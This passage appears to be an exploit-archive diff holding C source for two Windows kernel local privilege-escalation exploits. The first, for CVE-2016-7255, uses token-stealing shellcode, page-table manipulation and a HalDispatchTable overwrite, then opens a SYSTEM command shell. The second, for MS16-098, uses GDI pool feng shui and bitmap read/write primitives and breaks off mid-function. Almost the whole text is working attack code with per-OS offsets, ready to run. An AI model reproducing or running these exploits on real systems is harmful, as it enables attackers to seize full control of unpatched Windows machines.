0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x48, 0x83, 0xfb, 0x04, // CMP RBX,0x4
0x75, 0xf3, // JNE <tag>
0x48, 0x8b, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV RBX, QWORD PTR [RAX+0x60] // GET TOKEN of SYSTEM
0x53, // PUSH RBX
//<tag2>
0x48, 0x8b, 0x00, // MOV RAX,QWORD PTR [RAX]
0x48, 0x8b, 0x58, 0xf8, // MOV RBX,QWORD PTR [RAX-0x8] // UniqueProcessID
0x39, 0xcb, // CMP EBX, ECX // our PID
0x75, 0xf5, // JNE <tag2>
0x5b, // POP RBX
0x48, 0x89, 0x98, 0x90, 0x90, 0x90, 0x90, // MOV QWORD PTR[RAX + 0x60], RBX
0x5b, // POP RBX
0x59, // POP RCX
0x58, // POP RAX
0x9d, // POPFQ
0xfb, // STI
0xff, 0xe0 // JMP RAX
};
ULONG __cdecl DbgPrint(__in char* Format, ...)
{
CHAR* pszDbgBuff = NULL;
va_list VaList = NULL;
ULONG ulRet = 0;
do
{
pszDbgBuff = (CHAR*)HeapAlloc(GetProcessHeap(), 0, 1024 * sizeof(CHAR));
if (NULL == pszDbgBuff)
{
break;
}
RtlZeroMemory(pszDbgBuff, 1024 * sizeof(CHAR));
va_start(VaList, Format);
_vsnprintf((CHAR*)pszDbgBuff, 1024 - 1, Format, VaList);
OutputDebugStringA(pszDbgBuff);
va_end(VaList);
} while (FALSE);
if (NULL != pszDbgBuff)
{
HeapFree(GetProcessHeap(), 0, pszDbgBuff);
pszDbgBuff = NULL;
}
return ulRet;
}
int _sim_key_down(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = 0;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_key_up(WORD wKey)
{
INPUT stInput = { 0 };
do
{
stInput.type = INPUT_KEYBOARD;
stInput.ki.wVk = wKey;
stInput.ki.dwFlags = KEYEVENTF_KEYUP;
SendInput(1, &stInput, sizeof(stInput));
} while (FALSE);
return 0;
}
int _sim_alt_shift_esc()
{
int i = 0;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return 0;
}
int _sim_alt_shift_tab(int nCount)
{
int i = 0;
HWND hWnd = NULL;
int nFinalRet = -1;
do
{
_sim_key_down(VK_MENU);
_sim_key_down(VK_SHIFT);
for (i = 0; i < nCount; i++)
{
_sim_key_down(VK_TAB);
_sim_key_up(VK_TAB);
Sleep(1000);
}
_sim_key_up(VK_MENU);
_sim_key_up(VK_SHIFT);
} while (FALSE);
return nFinalRet;
}
int _sim_alt_esc(int count)
{
int i = 0;
for (i = 0; i<count; i++)
{
_sim_key_down(VK_MENU);
//_sim_key_down(VK_SHIFT);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_down(VK_ESCAPE);
_sim_key_up(VK_ESCAPE);
_sim_key_up(VK_MENU);
//_sim_key_up(VK_SHIFT);
}
return 0;
}
int or_address_value_4(__in void* pAddress)
{
WNDCLASSEXW stWC = { 0 };
HWND hWndParent = NULL;
HWND hWndChild = NULL;
WCHAR* pszClassName = L"cve-2016-7255";
WCHAR* pszTitleName = L"cve-2016-7255";
void* pId = NULL;
MSG stMsg = { 0 };
UINT64 value = 0;
do
{
stWC.cbSize = sizeof(stWC);
stWC.lpfnWndProc = DefWindowProcW;
stWC.lpszClassName = pszClassName;
if (0 == RegisterClassExW(&stWC))
{
break;
}
hWndParent = CreateWindowExW(
0,
pszClassName,
NULL,
WS_OVERLAPPEDWINDOW | WS_VISIBLE,
0,
0,
360,
360,
NULL,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndParent)
{
break;
}
hWndChild = CreateWindowExW(
0,
pszClassName,
pszTitleName,
WS_OVERLAPPEDWINDOW | WS_VISIBLE | WS_CHILD,
0,
0,
160,
160,
hWndParent,
NULL,
GetModuleHandleW(NULL),
NULL
);
if (NULL == hWndChild)
{
break;
}
#ifdef _WIN64
pId = ((UCHAR*)pAddress - 0x28);
#else
pId = ((UCHAR*)pAddress - 0x14);
#endif // #ifdef _WIN64
SetWindowLongPtr(hWndChild, GWLP_ID, (LONG_PTR)pId);
DbgPrint("hWndChild = 0x%p\n", hWndChild);
ShowWindow(hWndParent, SW_SHOWNORMAL);
SetParent(hWndChild, GetDesktopWindow());
SetForegroundWindow(hWndChild);
_sim_alt_shift_tab(4);
SwitchToThisWindow(hWndChild, TRUE);
_sim_alt_shift_esc();
while (GetMessage(&stMsg, NULL, 0, 0)) {
SetFocus(hWndParent);
_sim_alt_esc(20);
SetFocus(hWndChild);
_sim_alt_esc(20);
TranslateMessage(&stMsg);
DispatchMessage(&stMsg);
if (value != 0) {
break;
}
__try {
value = *(UINT64 *)PML4_SELF_REF;
if ((value & 0x67) == 0x67) {
printf("Value Self Ref = %llx\n", value);
break;
}
}
__except (EXCEPTION_EXECUTE_HANDLER) {
continue;
}
}
} while (FALSE);
if (NULL != hWndParent)
{
DestroyWindow(hWndParent);
hWndParent = NULL;
}
if (NULL != hWndChild)
{
DestroyWindow(hWndChild);
hWndChild = NULL;
}
UnregisterClassW(pszClassName, GetModuleHandleW(NULL));
return 0;
}
UINT64 get_pxe_address(UINT64 address) {
UINT entry = PML4_SELF_REF_INDEX;
UINT64 result = address >> 9;
UINT64 lower_boundary = ((UINT64)0xFFFF << 48) | ((UINT64)entry << 39);
UINT64 upper_boundary = (((UINT64)0xFFFF << 48) | ((UINT64)entry << 39) + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8;
result = result | lower_boundary;
result = result & upper_boundary;
return result;
}
UINT64 look_free_entry_pml4(void) {
// Looks for a free pml4e in the last 0x100 bytes of the PML4
int offset = 0xF00;
UINT64 pml4_search = PML4_BASE + offset;
while (offset < 0xFF8)
{
if ((*(PVOID *)pml4_search) == 0x0)
{
// This is a NULL (free) entry
break;
}
offset += 8;
pml4_search = PML4_BASE + offset;
}
return pml4_search;
}
UINT64 calculate_spurious_pt_address(UINT64 spurious_offset) {
UINT64 index = (spurious_offset & 0xFFF) / 8;
UINT64 result = (
((UINT64)0xFFFF << 48) |
((UINT64)PML4_SELF_REF_INDEX << 39) |
((UINT64)PML4_SELF_REF_INDEX << 30) |
((UINT64)PML4_SELF_REF_INDEX << 21) |
(index << 12)
);
return result;
}
UINT64 create_spurious_pte_to_virtual_address(UINT64 virtual_address, BOOL patch_original) {
/*
1: kd> !pte ffffffff`ffd00000
VA ffffffffffd00000
PXE at FFFFF6FB7DBEDFF8 PPE at FFFFF6FB7DBFFFF8 PDE at FFFFF6FB7FFFFFF0 PTE at FFFFF6FFFFFFE800
contains 0000000000A1F063 contains 0000000000A20063 contains 0000000000A25063 contains 8000000000103963
pfn a1f-- - DA--KWEV pfn a20-- - DA--KWEV pfn a25-- - DA--KWEV pfn 103 - G - DA--KW - V
*/
UINT64 pte = get_pxe_address(virtual_address);
int pte_offset = pte & 0xFFF;
//printf("PTE: %llx, %x\n", pte, pte_offset);
UINT64 pde = get_pxe_address(pte);
int pde_offset = pde & 0xFFF;
//printf("PDE: %llx, %x\n", pde, pde_offset);
UINT64 pdpte = get_pxe_address(pde);
int pdpte_offset = pdpte & 0xFFF;
//printf("PDPTE: %llx,%x\n", pdpte, pdpte_offset);
UINT64 pml4e = get_pxe_address(pdpte);
int pml4e_offset = pml4e & 0xFFF;
//printf("PML4E: %llx\n", pml4e, pml4e_offset);
UINT64 spurious_offset = look_free_entry_pml4();
printf("[+] Selected spurious PML4E: %llx\n", spurious_offset);
UINT64 f_e_pml4 = spurious_offset;
UINT64 spurious_pt = calculate_spurious_pt_address(spurious_offset);
printf("[+] Spurious PT: %llx\n", spurious_pt);
printf("--------------------------------------------------\n\n");
//Read the physical address of pml4e
UINT64 pml4e_pfn = (UINT64)(*(PVOID *)pml4e);
printf("[+] Content pml4e %llx: %llx\n", pml4e, pml4e_pfn);
// Change the PxE
pml4e_pfn = pml4e_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PML4e) %llx: %llx\n",f_e_pml4, pml4e_pfn);
*((PVOID *)spurious_offset) = (PVOID)pml4e_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pdpte
UINT64 pdpte_pfn = (UINT64) *(PVOID *)(spurious_pt + pdpte_offset);
printf("[+] Content pdpte %llx: %llx\n", pdpte, pdpte_pfn);
// Change the PxE
pdpte_pfn = pdpte_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDPTE) %llx: %llx\n", spurious_offset, pdpte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pdpte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pde
UINT64 pde_addr = spurious_pt + pde_offset;
UINT64 pde_pfn = (UINT64) *(PVOID *)(spurious_pt + pde_offset);
printf("[+] Content pdpe %llx: %llx\n", pde, pde_pfn);
// Change the PxE
pde_pfn = pde_pfn | 0x67; // Set U/S
printf("[+] Patching the Spurious Offset (PDE) %llx: %llx\n", spurious_offset, pde_pfn);
*((PVOID *)spurious_offset) = (PVOID)pde_pfn;
Sleep(0x1); // Sleep for TLB refresh;
//Read the physical address of pte
UINT64 pte_addr = spurious_pt + pte_offset;
UINT64 pte_pfn = (UINT64) *(PVOID *)(spurious_pt + pte_offset);
printf("[+] Content pte %llx: %llx\n", pte, pte_pfn);
// Change the PxE
pte_pfn = pte_pfn | 0x67; // Set U/S
pte_pfn = pte_pfn & 0x7fffffffffffffff; // Turn off NX
if (patch_original) {
printf("*** Patching the original location to enable NX...\n");
*(PVOID *)(spurious_pt + pte_offset) = (PVOID)pte_pfn;
}
printf("[+] Patching the Spurious Offset (PTE) %llx: %llx\n", spurious_offset, pte_pfn);
*((PVOID *)spurious_offset) = (PVOID)pte_pfn;
Sleep(0x1); // Sleep for TLB refresh;
printf("\n\n");
return spurious_pt;
}
UINT64 get_OverwriteAddress_pointer(UINT64 target_address, int target_offset) {
printf("[*] Getting Overwrite pointer: %llx\n", target_address);
UINT64 OverwriteAddress = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteAddress += (target_address & 0xFFF);
printf("OverwriteAddress: %llx\n", OverwriteAddress);
return (UINT64) *((PVOID *)(((char *)OverwriteAddress) + target_offset));
}
void overwrite_TargetAddress(UINT64 hook_address, UINT64 target_address, int target_offset) {
UINT64 OverwriteTarget = create_spurious_pte_to_virtual_address(target_address, FALSE);
OverwriteTarget += (target_address & 0xFFF);
UINT64 target = (UINT64)((char *)OverwriteTarget) + target_offset;
printf("Patch OverwriteTarget: %llx with %llx\n", target, hook_address);
*(PVOID *)target = (PVOID)hook_address;
}
UINT64 store_shellcode_in_hal(void) {
//// Finally store the shellcode on the HAL
UINT64 hal_heap_addr = 0xFFFFFFFFFFD00000;
UINT64 hal_heap = create_spurious_pte_to_virtual_address(hal_heap_addr, TRUE);
printf("HAL address: %llx\n", hal_heap);
// 0xffffffffffd00d50 this is a good offset to store shellcode
// 0xfff - 0xd50 = 0x2af space
memcpy(((char *)hal_heap) + 0xd50, shellcode, sizeof(shellcode));
return 0xffffffffffd00d50;
}
UINT64 GetHalDispatchTable() {
PCHAR KernelImage;
SIZE_T ReturnLength;
HMODULE hNtDll = NULL;
UINT64 HalDispatchTable;
HMODULE hKernelInUserMode = NULL;
PVOID KernelBaseAddressInKernelMode;
NTSTATUS NtStatus = STATUS_UNSUCCESSFUL;
PSYSTEM_MODULE_INFORMATION pSystemModuleInformation;
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t\t[-] Failed To Load NtDll.dll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQuerySystemInformation = (NtQuerySystemInformation_t)GetProcAddress(hNtDll, "NtQuerySystemInformation");
if (!NtQuerySystemInformation) {
printf("\t\t\t[-] Failed Resolving NtQuerySystemInformation: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation, NULL, 0, &ReturnLength);
// Allocate the Heap chunk
pSystemModuleInformation = (PSYSTEM_MODULE_INFORMATION)HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
ReturnLength);
if (!pSystemModuleInformation) {
printf("\t\t\t[-] Memory Allocation Failed For SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtStatus = NtQuerySystemInformation(SystemModuleInformation,
pSystemModuleInformation,
ReturnLength,
&ReturnLength);
if (NtStatus != STATUS_SUCCESS) {
printf("\t\t\t[-] Failed To Get SYSTEM_MODULE_INFORMATION: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
KernelBaseAddressInKernelMode = pSystemModuleInformation->Module[0].Base;
KernelImage = strrchr((PCHAR)(pSystemModuleInformation->Module[0].ImageName), '\\') + 1;
printf("\t\t\t[+] Loaded Kernel: %s\n", KernelImage);
printf("\t\t\t[+] Kernel Base Address: 0x%p\n", KernelBaseAddressInKernelMode);
hKernelInUserMode = LoadLibraryA(KernelImage);
if (!hKernelInUserMode) {
printf("\t\t\t[-] Failed To Load Kernel: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
// This is still in user mode
HalDispatchTable = (UINT64)GetProcAddress(hKernelInUserMode, "HalDispatchTable");
if (!HalDispatchTable) {
printf("\t\t\t[-] Failed Resolving HalDispatchTable: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
else {
HalDispatchTable = (ULONGLONG)HalDispatchTable - (ULONGLONG)hKernelInUserMode;
// Here we get the address of HapDispatchTable in Kernel mode
HalDispatchTable = ((ULONGLONG)HalDispatchTable + (ULONGLONG)KernelBaseAddressInKernelMode);
printf("\t\t\t[+] HalDispatchTable: 0x%llx\n", HalDispatchTable);
}
HeapFree(GetProcessHeap(), 0, (LPVOID)pSystemModuleInformation);
if (hNtDll) {
FreeLibrary(hNtDll);
}
if (hKernelInUserMode) {
FreeLibrary(hKernelInUserMode);
}
hNtDll = NULL;
hKernelInUserMode = NULL;
pSystemModuleInformation = NULL;
return HalDispatchTable;
}
int __cdecl main(int argc, char** argv)
{
TCHAR pre_username[256];
TCHAR post_username[256];
DWORD size = 256;
ULONG Interval = 0;
HMODULE hNtDll = NULL;
UINT retval;
UINT64 overwrite_address;
int overwrite_offset;
// define operating system version specific variables
unsigned char sc_KPROCESS;
unsigned int sc_TOKEN;
unsigned int sc_APLINKS;
int osversion;
if (argc != 2) {
printf("Please enter an OS version\n");
printf("The following OS'es are supported:\n");
printf("\t[*] 7 - Windows 7\n");
printf("\t[*] 81 - Windows 8.1\n");
printf("\t[*] 10 - Windows 10 prior to build release 14393 (Anniversary Update)\n");
printf("\t[*] 12 - Windows 2012 R2\n");
printf("\n");
printf("\t[*] For example: cve-2016-7255.exe 7 -- for Windows 7\n");
return -1;
}
osversion = _strtoui64(argv[1], NULL, 10);
if(osversion == 7)
{
// the target machine's OS is Windows 7 SP1
printf(" [+] Windows 7 SP1\n");
sc_KPROCESS = 0x70; // dt -r1 nt!_KTHREAD +0x050 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x80; // dt -r1 nt!_EPROCESS [+0x208 Token : _EX_FAST_REF] - [+0x188 ActiveProcessLinks : _LIST_ENTRY] = (0x80)
sc_APLINKS = 0x188; // dt -r1 nt!_EPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = GetHalDispatchTable(); // HalDispatchTable
overwrite_offset = 0x8; // QueryIntervalProfile
}
else if(osversion == 81)
{
// the target machine's OS is Windows 8.1
printf(" [+] Windows 8.1\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd00510; // HalpInterruptController_address (dq poi(hal!HalpInterruptController))
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 10)
{
// the target machine's OS is Windows 10 prior to build 14393
printf(" [+] Windows 10\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x68; // dt -r1 nt!_EPROCESS [+0x358 Token : _EX_FAST_REF] - [+0x2f0 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2f0; // dt -r1 nt!_EPROCESS +0x2f0 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd004c0; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
else if(osversion == 12)
{
// the target machine's OS is Windows 2012 R2
printf(" [+] Windows 2012 R2\n");
sc_KPROCESS = 0xB8; // dt -r1 nt!_KTHREAD +0x098 ApcState : _KAPC_STATE -> +0x020 Process : Ptr64 _KPROCESS
sc_TOKEN = 0x60; // dt -r1 nt!_EPROCESS [+0x348 Token : _EX_FAST_REF] - [+0x2e8 ActiveProcessLinks : _LIST_ENTRY] = (0x60)
sc_APLINKS = 0x2e8; // dt -r1 nt!_EPROCESS +0x2e8 ActiveProcessLinks : _LIST_ENTRY
overwrite_address = 0xffffffffffd12c70; // HalpInterruptController_address (dq poi(hal!HalpInterruptController)
overwrite_offset = 0x78; // HalpApicRequestInterruptOffset (dq halpApicRequestInterrupt)
}
// in case the OS version is not any of the previously checked versions
else
{
printf(" [-] Unsupported version\n");
printf(" [*] Affected 64-bit operating systems\n");
printf(" [*] Windows 7 SP1 -- cve-2016-7255.exe 7\n");
printf(" [*] Windows 8.1 -- cve-2016-7255.exe 81\n");
printf(" [*] Windows 10 before build 14393 -- cve-2016-7255.exe 10\n");
printf(" [*] Windows 2012 R2 -- cve-2016-7255.exe 12\n");
return -1;
}
printf("My PID is: %d\n", GetCurrentProcessId());
GetUserName(pre_username, &size);
printf("Current Username: %s\n", pre_username);
printf("PML4 Self Ref: %llx\n", PML4_SELF_REF);
printf("Shellcode stored at: %p\n", (void *) &shellcode);
printf("Enter to continue...\n");
getchar();
do
{
or_address_value_4((void*)PML4_SELF_REF);
} while (FALSE);
PML4_SELF_REF_INDEX = GET_INDEX((UINT64)PML4_SELF_REF);
printf("[*] Self Ref Index: %x\n", PML4_SELF_REF_INDEX);
PML4_BASE = ((UINT64)PML4_SELF_REF & (UINT64)0xFFFFFFFFFFFFF000);
UINT64 original_pointer = get_OverwriteAddress_pointer(overwrite_address, overwrite_offset);
printf("Original OverwriteTarget pointer: %llx\n", original_pointer);
DWORD pid = GetCurrentProcessId();
/* Shellcode Patching !! */
char *p = shellcode;
p += 4; // skip the CLI, PUSHF and MOV RAX bytes
*(PVOID *)p = (PVOID)original_pointer; // Patch shellcode1
p += 12; // Patch shellcode with original value in the Overwrite address
*(PVOID *)p = (PVOID)(overwrite_address + overwrite_offset);
p += 12; // To patch the PID of our process
*(DWORD *)p = (DWORD)pid;
p += 17;
*(unsigned char *)p = (unsigned char)sc_KPROCESS;
p += 7;
*(unsigned int *)p = (unsigned int)sc_APLINKS;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
p += 20;
*(unsigned int *)p = (unsigned int)sc_TOKEN;
UINT64 shellcode_va = store_shellcode_in_hal();
printf("[+] w00t: Shellcode stored at: %llx\n", shellcode_va);
overwrite_TargetAddress(shellcode_va, overwrite_address, overwrite_offset);
if (osversion == 7){
// Exploit Win7.1
hNtDll = LoadLibrary("ntdll.dll");
if (!hNtDll) {
printf("\t\t[-] Failed loading NtDll: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile = (NtQueryIntervalProfile_t)GetProcAddress(hNtDll, "NtQueryIntervalProfile");
if (!NtQueryIntervalProfile) {
printf("\t\t[-] Failed Resolving NtQueryIntervalProfile: 0x%X\n", GetLastError());
exit(EXIT_FAILURE);
}
NtQueryIntervalProfile(0x1337, &Interval);
}
while (1) {
size = 256;
GetUserName(post_username, &size);
if (memcmp(post_username, pre_username, 256) != 0) break;
}
Sleep(2000);
system("cmd.exe");
return 0;
}

309
platforms/windows/local/41020.c Executable file
View file

@ -0,0 +1,309 @@
// Source: https://github.com/sensepost/ms16-098/tree/b85b8dfdd20a50fc7bc6c40337b8de99d6c4db80
// Binary: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41020.exe
#include <Windows.h>
#include <wingdi.h>
#include <stdio.h>
#include <winddi.h>
#include <time.h>
#include <stdlib.h>
#include <Psapi.h>
HANDLE hWorker, hManager;
BYTE *bits;
//dt nt!_EPROCESS UniqueProcessID ActiveProcessLinks Token
typedef struct
{
DWORD UniqueProcessIdOffset;
DWORD TokenOffset;
} VersionSpecificConfig;
VersionSpecificConfig gConfig = { 0x2e0, 0x348 }; //win 8.1
void AllocateClipBoard2(unsigned int size) {
BYTE *buffer;
buffer = malloc(size);
memset(buffer, 0x41, size);
buffer[size - 1] = 0x00;
const size_t len = size;
HGLOBAL hMem = GlobalAlloc(GMEM_MOVEABLE, len);
memcpy(GlobalLock(hMem), buffer, len);
GlobalUnlock(hMem);
//OpenClipboard(0);
//EmptyClipboard();
SetClipboardData(CF_TEXT, hMem);
//CloseClipboard();
//GlobalFree(hMem);
}
static HBITMAP bitmaps[5000];
void fungshuei() {
HBITMAP bmp;
// Allocating 5000 Bitmaps of size 0xf80 leaving 0x80 space at end of page.
for (int k = 0; k < 5000; k++) {
//bmp = CreateBitmap(1685, 2, 1, 8, NULL); //800 = 0x8b0 820 = 0x8e0 1730 = 0x1000 1700 = 0xfc0 1670 = 0xf70
bmp = CreateBitmap(1670, 2, 1, 8, NULL); // 1680 = 0xf80 1685 = 0xf90 allocation size 0xfa0
bitmaps[k] = bmp;
}
HACCEL hAccel, hAccel2;
LPACCEL lpAccel;
// Initial setup for pool fengshui.
lpAccel = (LPACCEL)malloc(sizeof(ACCEL));
SecureZeroMemory(lpAccel, sizeof(ACCEL));
// Allocating 7000 accelerator tables of size 0x40 0x40 *2 = 0x80 filling in the space at end of page.
HACCEL *pAccels = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
HACCEL *pAccels2 = (HACCEL *)malloc(sizeof(HACCEL) * 7000);
for (INT i = 0; i < 7000; i++) {
hAccel = CreateAcceleratorTableA(lpAccel, 1);
hAccel2 = CreateAcceleratorTableW(lpAccel, 1);
pAccels[i] = hAccel;
pAccels2[i] = hAccel2;
}
// Delete the allocated bitmaps to free space at beiginig of pages
for (int k = 0; k < 5000; k++) {
DeleteObject(bitmaps[k]);
}
//allocate Gh04 5000 region objects of size 0xbc0 which will reuse the free-ed bitmaps memory.
for (int k = 0; k < 5000; k++) {
CreateEllipticRgn(0x79, 0x79, 1, 1); //size = 0xbc0
}
// Allocate Gh05 5000 bitmaps which would be adjacent to the Gh04 objects previously allocated
for (int k = 0; k < 5000; k++) {
bmp = CreateBitmap(0x52, 1, 1, 32, NULL); //size = 3c0
bitmaps[k] = bmp;
}
// Allocate 17500 clipboard objects of size 0x60 to fill any free memory locations of size 0x60
for (int k = 0; k < 1700; k++) { //1500
AllocateClipBoard2(0x30);
}
// delete 2000 of the allocated accelerator tables to make holes at the end of the page in our spray.
for (int k = 2000; k < 4000; k++) {
DestroyAcceleratorTable(pAccels[k]);
DestroyAcceleratorTable(pAccels2[k]);
}
}
void SetAddress(BYTE* address) {
for (int i = 0; i < sizeof(address); i++) {
bits[0xdf0 + i] = address[i];
}
SetBitmapBits(hManager, 0x1000, bits);
}
void WriteToAddress(BYTE* data) {
SetBitmapBits(hWorker, sizeof(data), data);
}
LONG ReadFromAddress(ULONG64 src, BYTE* dst, DWORD len) {
SetAddress((BYTE *)&src);
return GetBitmapBits(hWorker, len, dst);
}
// Get base of ntoskrnl.exe
ULONG64 GetNTOsBase()
{
ULONG64 Bases[0x1000];
DWORD needed = 0;
ULONG64 krnlbase = 0;
if (EnumDeviceDrivers((LPVOID *)&Bases, sizeof(Bases), &needed)) {
krnlbase = Bases[0];
}
return krnlbase;
}
// Get EPROCESS for System process
ULONG64 PsInitialSystemProcess()
{
// load ntoskrnl.exe
ULONG64 ntos = (ULONG64)LoadLibrary("ntoskrnl.exe");
// get address of exported PsInitialSystemProcess variable
ULONG64 addr = (ULONG64)GetProcAddress((HMODULE)ntos, "PsInitialSystemProcess");
FreeLibrary((HMODULE)ntos);
ULONG64 res = 0;
ULONG64 ntOsBase = GetNTOsBase();
// subtract addr from ntos to get PsInitialSystemProcess offset from base
if (ntOsBase) {
ReadFromAddress(addr - ntos + ntOsBase, (BYTE *)&res, sizeof(ULONG64));
}
return res;
}
// Get EPROCESS for current process
ULONG64 PsGetCurrentProcess()
{
ULONG64 pEPROCESS = PsInitialSystemProcess();// get System EPROCESS
// walk ActiveProcessLinks until we find our Pid
LIST_ENTRY ActiveProcessLinks;
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
ULONG64 res = 0;
while (TRUE) {
ULONG64 UniqueProcessId = 0;
// adjust EPROCESS pointer for next entry
pEPROCESS = (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64);
// get pid
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset, (BYTE *)&UniqueProcessId, sizeof(ULONG64));
// is this our pid?
if (GetCurrentProcessId() == UniqueProcessId) {
res = pEPROCESS;
break;
}
// get next entry
ReadFromAddress(pEPROCESS + gConfig.UniqueProcessIdOffset + sizeof(ULONG64), (BYTE *)&ActiveProcessLinks, sizeof(LIST_ENTRY));
// if next same as last, we reached the end
if (pEPROCESS == (ULONG64)(ActiveProcessLinks.Flink) - gConfig.UniqueProcessIdOffset - sizeof(ULONG64))
break;
}
return res;
}
void main(int argc, char* argv[]) {
HDC hdc = GetDC(NULL);
HDC hMemDC = CreateCompatibleDC(hdc);
HGDIOBJ bitmap = CreateBitmap(0x5a, 0x1f, 1, 32, NULL);
HGDIOBJ bitobj = (HGDIOBJ)SelectObject(hMemDC, bitmap);
static POINT points[0x3fe01];
for (int l = 0; l < 0x3FE00; l++) {
points[l].x = 0x5a1f;
points[l].y = 0x5a1f;
}
points[2].y = 20;
points[0x3FE00].x = 0x4a1f;
points[0x3FE00].y = 0x6a1f;
if (!BeginPath(hMemDC)) {
fprintf(stderr, "[!] BeginPath() Failed: %x\r\n", GetLastError());
}
for (int j = 0; j < 0x156; j++) {
if (j > 0x1F && points[2].y != 0x5a1f) {
points[2].y = 0x5a1f;
}
if (!PolylineTo(hMemDC, points, 0x3FE01)) {
fprintf(stderr, "[!] PolylineTo() Failed: %x\r\n", GetLastError());
}
}
EndPath(hMemDC);
//Kernel Pool Fung=Shuei
fungshuei();
//getchar();
fprintf(stdout, "[+] Trigerring Exploit.\r\n");
if (!FillPath(hMemDC)) {
fprintf(stderr, "[!] FillPath() Failed: %x\r\n", GetLastError());
}
printf("%s\r\n", "Done filling.");
HRESULT res;
VOID *fake = VirtualAlloc(0x0000000100000000, 0x100, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
if (!fake) {
fprintf(stderr, "VirtualAllocFailed. %x\r\n", GetLastError());
}
memset(fake, 0x1, 0x100);
bits = malloc(0x1000);
memset(bits, 0x42, 0x1000);
for (int k=0; k < 5000; k++) {
res = GetBitmapBits(bitmaps[k], 0x1000, bits); //1685 * 2 * 1 + 1
if (res > 0x150) {
fprintf(stdout, "GetBitmapBits Result. %x\r\nindex: %d\r\n", res, k);
hManager = bitmaps[k];
hWorker = bitmaps[k + 1];
// Get Gh05 header to fix overflown header.
static BYTE Gh04[0x9];
fprintf(stdout, "\r\nGh04 header:\r\n");
for (int i = 0; i < 0x10; i++){
Gh04[i] = bits[0x1d0 + i];
fprintf(stdout, "%02x", bits[0x1d0 + i]);
}
// Get Gh05 header to fix overflown header.
static BYTE Gh05[0x9];
fprintf(stdout, "\r\nGh05 header:\r\n");
for (int i = 0; i < 0x10; i++) {
Gh05[i] = bits[0xd90 + i];
fprintf(stdout, "%02x", bits[0xd90 + i]);
}
// Address of Overflown Gh04 object header
static BYTE addr1[0x7];
fprintf(stdout, "\r\nPrevious page Gh04 (Leaked address):\r\n");
for (int j = 0; j < 0x8; j++) {
addr1[j] = bits[0x210 + j];
fprintf(stdout, "%02x", bits[0x210 + j]);
}
//Get pvscan0 address of second Gh05 object
static BYTE* pvscan[0x07];
fprintf(stdout, "\r\nPvsca0:\r\n");
for (int i = 0; i < 0x8; i++) {
pvscan[i] = bits[0xdf0 + i];
fprintf(stdout, "%02x", bits[0xdf0 + i]);
}
// Calculate address to overflown Gh04 object header.
addr1[0x0] = 0;
int u = addr1[0x1];
u = u - 0x10;
addr1[1] = u;
//Fix overflown Gh04 object Header
SetAddress(addr1);
WriteToAddress(Gh04);
// Calculate address to overflown Gh05 object header.
addr1[0] = 0xc0;
int y = addr1[1];
y = y + 0xb;
addr1[1] = y;
//Fix overflown Gh05 object Header
